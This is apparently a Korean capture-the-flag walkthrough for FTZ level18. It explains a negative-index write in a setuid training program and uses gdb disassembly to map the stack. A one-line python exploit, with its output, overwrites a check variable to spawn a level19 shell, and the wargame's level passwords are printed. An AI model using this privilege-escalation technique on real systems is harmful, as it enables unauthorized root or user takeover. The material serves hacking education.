[FTZ] level18 풀이

💡 FTZ level18 풀이

문제

계정 : level18/why did you do it

hint

#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
void shellout(void);
int main()
{
  char string[100];
  int check;
  int x = 0;
  int count = 0;
  fd_set fds;
  printf("Enter your command: ");
  fflush(stdout);
  while(1)
    {
      if(count >= 100)
        printf("what are you trying to do?\n");
      if(check == 0xdeadbeef)
        shellout();
      else
        {
          FD_ZERO(&fds);
          FD_SET(STDIN_FILENO,&fds);

          if(select(FD_SETSIZE, &fds, NULL, NULL, NULL) >= 1)
            {
              if(FD_ISSET(fileno(stdin),&fds))
                {
                  read(fileno(stdin),&x,1);
                  switch(x)
                    {
                      case '\r':
                      case '\n':
                        printf("\a");
                        break;
                      case 0x08:
                        count--;
                        printf("\b \b");
                        break;
                      default:
                        string[count] = x;
                        count++;
                        break;
                    }
                }
            }
        }
    }
}

void shellout(void)
{
  setreuid(3099,3099);
  execl("/bin/sh","sh",NULL);
}

풀이

이번 문제는 특이하게 string 변수가 가장 먼저 선언되어 있습니다. 대략적으로 스택을 그려보면 다음과 같습니다.

string[100]
check
x
count
...

이렇게 스택이 구성되면 일반적으로는 string에 쓰기만 해서는 다른 변수를 덮을 수가 없습니다. 하지만 이번 문제에서는 string의 인덱싱을 count 변수로 하며, 이 count 변수가 음수가 될 수 있다는 점이 포인트입니다.

즉 count = -4 일때, string[count]로 접근하면 check를 포함한 다른 변수들에 접근이 가능해 집니다.

gdb로 먼저 스택을 분석합니다.

[level18@ftz level18]$ gdb -q attackme
(no debugging symbols found)...(gdb)
(gdb)
(gdb) set disas intel
(gdb) disass main
Dump of assembler code for function main:
0x08048550 <main+0>:    push   ebp
0x08048551 <main+1>:    mov    ebp,esp
0x08048553 <main+3>:    sub    esp,0x100
0x08048559 <main+9>:    push   edi
0x0804855a <main+10>:   push   esi
0x0804855b <main+11>:   push   ebx
0x0804855c <main+12>:   mov    DWORD PTR [ebp-108],0x0  //x=0
0x08048563 <main+19>:   mov    DWORD PTR [ebp-112],0x0  //count =0
0x0804856a <main+26>:   push   0x8048800
0x0804856f <main+31>:   call   0x8048470 <printf>
0x08048574 <main+36>:   add    esp,0x4
0x08048577 <main+39>:   mov    eax,ds:0x804993c
0x0804857c <main+44>:   mov    DWORD PTR [ebp-252],eax
0x08048582 <main+50>:   mov    ecx,DWORD PTR [ebp-252]
0x08048588 <main+56>:   push   ecx
0x08048589 <main+57>:   call   0x8048430 <fflush>
0x0804858e <main+62>:   add    esp,0x4
0x08048591 <main+65>:   jmp    0x8048598 <main+72>
0x08048593 <main+67>:   jmp    0x8048775 <main+549>
0x08048598 <main+72>:   cmp    DWORD PTR [ebp-112],0x63 // count<100 비교
0x0804859c <main+76>:   jle    0x80485ab <main+91>
0x0804859e <main+78>:   push   0x8048815
0x080485a3 <main+83>:   call   0x8048470 <printf>
0x080485a8 <main+88>:   add    esp,0x4
0x080485ab <main+91>:   cmp    DWORD PTR [ebp-104],0xdeadbeef // check = 0xdeadbeef 비교
0x080485b2 <main+98>:   jne    0x80485c0 <main+112>
0x080485b4 <main+100>:  call   0x8048780 <shellout>
0x080485b9 <main+105>:  jmp    0x8048770 <main+544>
0x080485be <main+110>:  mov    esi,esi
0x080485c0 <main+112>:  lea    edi,[ebp-240]

... 생략

위의 변수들을 보면 스택이 다음과 같다는 걸 알 수 있습니다.

string (100byte) // ebp-100
check (4byte)    // ebp-104
x (4byte)        // ebp-108
count (4byte)    // ebp-112

따라서 count 값을 -4로 만들어서 메모리에 접근하면, check 변수에 접근할 수 있습니다.

코드를 보면 ‘\x08’일때 count가 1씩 감소하므로 ‘\x08’을 4번 입력한 뒤에, check값을 넣어주면 됩니다.

[level18@ftz level18]$ (python -c 'print("\x08"*4 + "\xef\xbe\xad\xde")';cat) | ./attackme
Enter your command:
id
uid=3099(level19) gid=3098(level18) groups=3098(level18)

my-pass
Level19 Password is "swimming in pink".

쉘을 획득했습니다.